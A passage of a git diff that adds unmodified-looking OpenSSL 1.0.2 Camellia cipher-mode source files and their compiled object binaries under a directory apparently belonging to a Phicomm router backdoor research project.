z9w~iJ2+hG&FN2Z0k#i6^9VP6#fWwCfm$$*y%}Ct>EpH*CG~C}0bgTkxA#kyXP%kH>
zE<=u6Kt_8|ay}t+J7IbYcpQXurhvdTgvK9WViY(j244}7lt5UOf`~Jabv;7uLNG89
zRP-Wr^O5vW!XlNBJP%2~0+R0m!)FpsUlMA`gy%DaQaUnt5ma1^G`0~k4}+&7kn=ZN
zdn*zxKyGItt3>dUM+mh59SxA*3*c}v=&6hR9{^ch38DMI>#u~^GNeD7kha19Lc-@t
zu=zDI4S?+hgkEpte;mYLiv%7AV@Y7GgX$klW`ddJ$m1~horYw~2=y?jWFX<)2l@0s
z0z*L6hlJryWYGk4&jN?_!HP#nRzmJuNe!2RtsF4?F4+GGgnv(}couB^0}7Ua+}}t!
z8%P^Zf{-gf%VK2G9c)zxmz_Y!dmy?a>EnHHH-l7k7byA>Tzv+r45_9qxcCnAp9?1U
zky56Effb~(Y~;HXoZNuS+kmn=LD5LCcnG8)K|+s!`FFt2F;YV-(#Qm`*a+-21v8aN
zA=iP4y<qnekT#VR*_xEu4f(!7+WZrw)dATq7``9;%mqWwgY}z`>0pqv7Wt1S-93kd
zpC;Y3BrR6~6BmHEPr>Nfq`QWsf?A~0nxx4J(9{h4)&>(bkah{F;}_7e4y0@b=^v5W
z3rWYrK+0~?^GecTf3W*A=-5Om%K~}#%AI%IadYju4|M3;Gp}#$o9YMaH@Moqp|5{w
zzi@4X`VAUh5pC8T7D?n!3*svL-FeRgk{~ie+w|Ye`l%5;NTvSGq*A}MN*5$oOBzv0
zB#ZW%v3pPOLzQHwroEOBO3iq+awxTSeqt!K?(iy3YJ-=nI;l4fu2#8ua%ux7wJ!JQ
z6G}}Br6&1vw2RHrSRd-ok)v~jPd7(OVrm07wJ!I<sTtwaw8qS#wtpI%<NVk$i=+PY
zNI%&+Z)3HsvCf-)x_Qs~cV2A62DMGst^Y65Pki3!)#<-+3BKHYx?g1QrQZF|4<YuS
zjkHwucjdp|QWsb9cPZBHzr{q)E1%qc(y+=>?WC&{r<L^=uhV=gi*=e-wWsQTw5w0f
zI%!>g4A6E}tUZ41?<;LNvG&O^yW>7>6Kh`*Yxnnywr6AQHO}UQPrSc$Y~Q1E_wJ9k
zuisJbh@G}=9=i9T6IbCUIzRJR=bk4u^z4}XOz*r<_g)>JXxpq;-=3ZNoc`vCR=4y2
zGUVi&QR_tBifu9a@x8^beE#S1lxUAr+uuz;eS7U_v+B_Qi(N{mQ`+PH9d}B5+`szo
zQT@c{iTgLcW%2g7f2Dq(XL{td@4zuHH+t+EKg;dhy?y<>&i(SFey8?%?WKMP=wCm#
zSM;J|uO2-*_vBvBUU{AC!;q`{<hAekMC|&po_*{0&h6E^b8g-<jM14ocWv7xm#vE$
z`2YN_&3JYFsS%n*n||uY;wO3)?HfPW;|2UFBC_~9`BPChdZlrzpELQ>=OpO`pN!~1
zF5{@}rz*MUDbI~{kGns9DfKwhIsdQYZN}>Jbw5x342VDfBu?o4+9!A7{3iZ%e1lWk
z2V5F$P(7dg(Z2eLA44ad`!`}=U&Y3s+@|O8aq;$MoG7JEwSQu4eC>G0*fH+^cyl*S
zbk0-9FN=*&JLQ3=j_=Ia)9ruO711a3iyr*_S31VW$M^qq&(<M@8W?;A#GbGG))+c<
oyv}**-qR%Q>gu=1>(Rr%-={1`6eFh_KQ(55-oGQGC#R18FIV`iiU0rr

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cbc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cbc.c
new file mode 100644
index 0000000..a4907ca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cbc.c
@@ -0,0 +1,66 @@
+/* crypto/camellia/camellia_cbc.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/camellia.h>
+#include <openssl/modes.h>
+
+void Camellia_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                          size_t len, const CAMELLIA_KEY *key,
+                          unsigned char *ivec, const int enc)
+{
+
+    if (enc)
+        CRYPTO_cbc128_encrypt(in, out, len, key, ivec,
+                              (block128_f) Camellia_encrypt);
+    else
+        CRYPTO_cbc128_decrypt(in, out, len, key, ivec,
+                              (block128_f) Camellia_decrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cbc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cbc.o
new file mode 100644
index 0000000000000000000000000000000000000000..46527b50a563cbd9fe6d689aee3fd5ebcb344b51
GIT binary patch
literal 1784
zcmbu9J#Q015QgXCKms_BAPS@aG7aJ@D?1<sQXnUm?Fd;I1*f10$N6%^i1UZeXDOzD
zDisv@DU_77bo>NbN<@c{!n}7o_WC$ez({jD^LXF=nBDc;a;-9BStMrB0~%*Si9Tk=
zaWM*uv_M(<aqh~`^5N$&TYI+v{0$#7rfR9Qp1Z!&9CX4#?!LOC@+*b4L6jEWtmakz
z?u{5jNwe&W>?hc(k9KH==o6Sse}Q9|^?IAEgGFmOJ2!vC3kJUw{X%qAw|{G}$65M*
zoYp6kS^=y<Rxzo{M5~@;$TD>DPZ;sJDSUnkM>Qrb%jtPzow8@Ns9)077^Ly7Dg4<K
z-krk9ZTr6MHeKaX$!UAO|I$HfdmT3z_Cm6&wfg2p&8}A}Ps$Cuv9Vbz+vBd%t+f60
zaib1pVfEffJQ{J&i$|O6CY0BPy1;I-pJD%X9NR@eHgH^2;Y)yQxMR=?zYNF*ewJN$
zj$;_#%gCbyAJreWL#N4Y7{qN$qQLVV6?z9DsXZrjNHzO?Qf{~1_BzZu-Oy8f*H`+X
z<G#}QerKS1LAU1x;gD1`g4eQN1YFwDl>ZatSd2H2yrD&AFu6~07Wb7H?J_%RQ)D;o
z3kt*bJo*xy<`(nF&6abxrg`#3Ia-%&FotQjIl-9!sxPn>W9HdSllgC%kYkx&+I54O
zUEiCD5sOaHLk{pSpvxtgj&zh8kvNe032t(LF_Zcax<hhbN&PPOOFO^3E~uOn&JSAA
u3s0LHQ-8&Wt)(}NH+YIYsRv7*9V6P(8#+W{Sh9Y2x2bv!eM5^dss9Z<8J$}I

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cfb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cfb.c
new file mode 100644
index 0000000..59b8522
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cfb.c
@@ -0,0 +1,141 @@
+/* crypto/camellia/camellia_cfb.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/camellia.h>
+#include <openssl/modes.h>
+
+/*
+ * The input and output encrypted as though 128bit cfb mode is being used.
+ * The extra state information to record how much of the 128bit block we have
+ * used is contained in *num;
+ */
+
+void Camellia_cfb128_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t length, const CAMELLIA_KEY *key,
+                             unsigned char *ivec, int *num, const int enc)
+{
+
+    CRYPTO_cfb128_encrypt(in, out, length, key, ivec, num, enc,
+                          (block128_f) Camellia_encrypt);
+}
+
+/* N.B. This expects the input to be packed, MS bit first */
+void Camellia_cfb1_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t length, const CAMELLIA_KEY *key,
+                           unsigned char *ivec, int *num, const int enc)
+{
+    CRYPTO_cfb128_1_encrypt(in, out, length, key, ivec, num, enc,
+                            (block128_f) Camellia_encrypt);
+}
+
+void Camellia_cfb8_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t length, const CAMELLIA_KEY *key,
+                           unsigned char *ivec, int *num, const int enc)
+{
+    CRYPTO_cfb128_8_encrypt(in, out, length, key, ivec, num, enc,
+                            (block128_f) Camellia_encrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cfb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_cfb.o
new file mode 100644
index 0000000000000000000000000000000000000000..9a4de93a06835f35d1bba36aa2f9522e36c5c7f7
GIT binary patch
literal 2104
zcmbtU&1(};5T7*FR*f-=hhRk_6j5p)Nv)_+ByHTJYG^`DK|xtJ>(+{!50VWg9`xWv
z5VS}C0q<Tt2nGE^JbF~ThzN0J_f2;5vbofO_h#ldzj<G?voEz$VJZ><mIz!2-(wWu
z_q1>4Tr&rUAqKyWocdE4TqNYpjrnBdJ6UV5z9zryB?85KKASqbS?e~OZt9A-AkvGO
zOI_E^yjV($^zu0mrfo>*SP2~aa1_@!VG3ZEuqY0a<DP=Z^9_jf5|O#s%<K+c@Fe0i
zNKVkC#S?{iQj4c<#%Ix`*fqjYCdKc2;n27YjVXHDY4|x93m^~;eR;z9HltZl_x7V0
zc~RIu4!Zcv1e|U>E>ZVYNAVcC#{%bc-v+UH98?EYvIvCXw<q8R;<P@m%lg>_{yWKE
zMoq%}4`_$&3ufK6b#tpGOvoE`%eJ2w<YtyG>sG^T_gfC=#Zq~7rKFb&g*#eRudb|?
zG~H)2Ex&QEQZ1{=Ba04~9OY(wJa7d60HbUl$2)Na51@Sr$KQb`N6{vsZ=Y(!_-O)B
zRQ`eoyZkuX%)csem9GW(^sdZLNgVr*dT%H>X)(@qd8puAHxQkE-7#vYowld9*=k$1
zAsnmcfOup$28ddx1Hx?9>sAA?M$@qb_WokWG0dmZf86MbR=e4<+D;#YyMnc?Z?*Bg
z<q7^zr7)d(S?#nOVkGOH8qUNG${adWt6UI7`=f029f==AO}X5mNr|74xcX;!E90tC
z_dkyWT63@Y8O)_M(>Q{{`}6n3G2Wkb76WWEhxDhQ6R=h8EsRkw1iv|=@6v>la%X?y
z_hY1n2Cb>)f0Kls)U4F}2N(#eUyeYOHBSN6k8(Mm>ld~+rQDSleJ?fjIQ62MPncRe
egy4s~&}VW2B9|K?^uGwpe=W~%51F2!=Klji3*E;6

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ctr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ctr.c
new file mode 100644
index 0000000..b8f523d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ctr.c
@@ -0,0 +1,64 @@
+/* crypto/camellia/camellia_ctr.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/camellia.h>
+#include <openssl/modes.h>
+
+void Camellia_ctr128_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t length, const CAMELLIA_KEY *key,
+                             unsigned char ivec[CAMELLIA_BLOCK_SIZE],
+                             unsigned char ecount_buf[CAMELLIA_BLOCK_SIZE],
+                             unsigned int *num)
+{
+
+    CRYPTO_ctr128_encrypt(in, out, length, key, ivec, ecount_buf, num,
+                          (block128_f) Camellia_encrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ctr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ctr.o
new file mode 100644
index 0000000000000000000000000000000000000000..211402620d99993893e9b4043266d073c1c42803
GIT binary patch
literal 1656
zcmbtTKX21e5I@(276>6A2BRY6p+X?qr=)-g9Z=ekgg+6fN;-5vmSYS>I8NleNDTuZ
z!NADJVB{kp!NA90WJPQUDcsrb66fJ8aMJmH_w(Jm^S$${TC=`j7{Fq{Etq=D0+h`u
zuEekcCm{zvPhI%6GrmsDSgu;%3EX+}#rh15YIW1TwAUGia%kTaS4DBXbYmF1rI#B;
zQM`6Jp(zCxQ46R?P#X{SU;*G0aa{H+ViM!UE*OUeV<oq={2m)Uj~pq<IeOIcg?iq)
zowx7im&u<a^o@(~W1RKc%$xxA!rjbfnQ`~C9C;=j{hN&Wr8#_d$7Vd0*_0f*XHtE}
z-;UfWD$P-sO(e4T`*V2kx<TN0G7=tC-L4-5&s=g#8)e52y=c^z;53@8?X9NMs@EUZ
z+D?0GyIFIl(HvIY-QQ`q^kmf_PvRK*Cs2Qn6X9NI2k2Xww-J-ze#9C(^bmtlSGpav
zGD_?LqsR|jA^k%M;;}1T5S_sQgxBkK{SdjZCw+lCw?2@r_gwi;!=dO$y}lpG5s3H%
z|G;??;V330{|DHZOgpG=NCi0(zR$!<Vi}WNL8aMLP}B0727^*e3>-&Gb$GKZ#a~ps
zzR~;Yy>94?w5*{+XZ~w`33KU8?h|1wT>lCa%5r_Sw9kywp>NYp3hS}=@Ez@*8rLN9
zokI46NdV7}=?(%qQ_ugP0?Hhyte*b}`K<f<s1D?NqWhy<&SyTWHkJBD50tX{VEU)%
j-_rAm)9(%`uvC4QoRp~JCd_F>S@~a8elUqlfS&&c*0zAr

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ecb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ecb.c
new file mode 100644
index 0000000..16f1af8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ecb.c
@@ -0,0 +1,73 @@
+/* crypto/camellia/camellia_ecb.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#ifndef CAMELLIA_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+#include <openssl/camellia.h>
+#include "cmll_locl.h"
+
+void Camellia_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                          const CAMELLIA_KEY *key, const int enc)
+{
+
+    assert(in && out && key);
+    assert((CAMELLIA_ENCRYPT == enc) || (CAMELLIA_DECRYPT == enc));
+
+    if (CAMELLIA_ENCRYPT == enc)
+        Camellia_encrypt(in, out, key);
+    else
+        Camellia_decrypt(in, out, key);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ecb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_ecb.o
new file mode 100644
index 0000000000000000000000000000000000000000..4769ebfac1806b42adca9185bc233460e7893919
GIT binary patch
literal 1632
zcmbtT&2G~`5FR%z4G^GI9FU5TxgZd9l>kzq2b4BSf>1=I(jGV<%XSxnu${<WOAQh~
zkHC>5kH8~v<;H7pMBETkn6Y<aXK^^dNV7BZdA^zb8NclgdP|lCEEe2{B4QN4t`&Ye
zbK7tR8t~)X<)70p>B=|4vIY8`&bEE+&`Tqg+V{k5(cElprCHc|bE_$ucdq9!QI=8H
zP*+g<j}Bo8;4@*|?gIKG)~kK6j@PV>#%ldNZjkUx*%yFyZU1KIOv~_nT9s3)JTdKo
zcQMbZWxJloD5}AUKfw%NU4YjY;B*`F(!g-Nv`;?s6~yWOOxZ%93V*Nw2R{q~NBW-d
zq2q=!2wu1pIx_O($ykBYAMEY!44l1Q?{W9QIoR19be&SFPMdL$WX{tYJE<+b?P=6s
z(_GG$a5^L7w#IQDXeJ5~$s|;+2O?2%Zino}GH`{G#|p%et6UIXl7R3>VJIWSqLGpU
zXKXW3uK!ZU&!bd~<Iz~gY62pwAcxMg7_Xq{`5&H*T$(*|GTMld@H^&Fp36Sj4OF_b
zHfmXh`cj%2JcX9}@I+nI_*IRYlf19Ln}%wX<t7GH^I!Qb<Wf!EC%Tz%{~HWw%l+AI
zBhG#~^>sNY`DX4z{6>G@+zes-4wb~t)?(rNW5h#;YMT6yI>9`b$$yG@Rqyvf7vy)M
z_aiRz8L#S1t-sQOa#tUi{wey$Og>@e+aUyX-Tw&%CDG+($a(at_@6XCm}TaU$^Q)x
C+Ii{#

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_locl.h
new file mode 100644
index 0000000..4e4707b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/cmll_locl.h
@@ -0,0 +1,88 @@
+/* crypto/camellia/camellia_locl.h -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright 2006 NTT (Nippon Telegraph and Telephone Corporation) .
+ * ALL RIGHTS RESERVED.
+ *
+ * Intellectual Property information for Camellia:
+ *     http://info.isl.ntt.co.jp/crypt/eng/info/chiteki.html
+ *
+ * News Release for Announcement of Camellia open source:
+ *     http://www.ntt.co.jp/news/news06e/0604/060413a.html
+ *
+ * The Camellia Code included herein is developed by
+ * NTT (Nippon Telegraph and Telephone Corporation), and is contributed
+ * to the OpenSSL project.
+ *
+ * The Camellia Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
